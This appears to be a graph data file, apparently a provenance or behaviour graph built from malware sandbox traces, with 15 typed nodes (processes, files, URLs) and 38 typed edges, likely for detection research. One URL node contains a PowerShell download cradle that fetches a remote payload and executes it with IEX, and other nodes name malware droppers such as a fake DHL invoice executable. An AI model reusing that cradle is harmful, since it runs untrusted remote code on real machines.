15
MP*-DHL TAX INVOICE 289868063.exe 
MF-\Users\admin\AppData\Local\Temp\Heapman45.exe
MP-renamer-7.5.exe
MP-jerkoff.exe 
MF-.\T1218.001\src\T1218.001.c
SO-https://meta.ua/';$nwc.headers['Sec-Fetch-Dest']='document';$nwc.headers['Sec-Fetch-Mode']='no-cors';$nwc.headers['Sec-Fetch-Site']='cross-site';$nwc.headers['TE']='trailers';$nwc.headers['User-Agent']='Mozilla/5.0
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MF-CSIDL_COMMON_VIDEO\videotv.m3u
MP*-nltest.exe
TP*-c9923098.exe
MP-setup.exe 
MF-c:\Users\admin\AppData\Local\Temp\CSCF2B3
MF-\Users\admin\AppData\Local\Temp\207aa4515d\oneetx.exe
SO-https://clients2.google.com/cr/report
TP*-VRAPP.exe 
38
0 1 EX-1
0 2 FR-1
2 1 WR-1
0 3 FR-1
3 1 WR-1
2 3 UK-1
0 4 WR-1
5 0 RF-1
0 6 ST-1
0 7 RD-1
0 8 FR-1
8 1 CD-2
8 4 CD-2
8 5 ST-2
6 8 RF-1
8 7 RD-2
0 9 FR-1
9 1 RD-3
9 4 WR-3
9 5 ST-3
9 6 ST-3
9 7 WR-3
8 9 IJ-2
0 10 FR-1
10 1 EX-3
10 4 WR-3
10 5 ST-3
6 10 RF-3
10 7 EX-3
8 10 UK-2
9 11 RD-3
9 12 RD-3
9 13 ST-3
14 4 RD-4
5 14 RF-2
14 6 ST-4
14 7 WR-4
9 14 UK-3

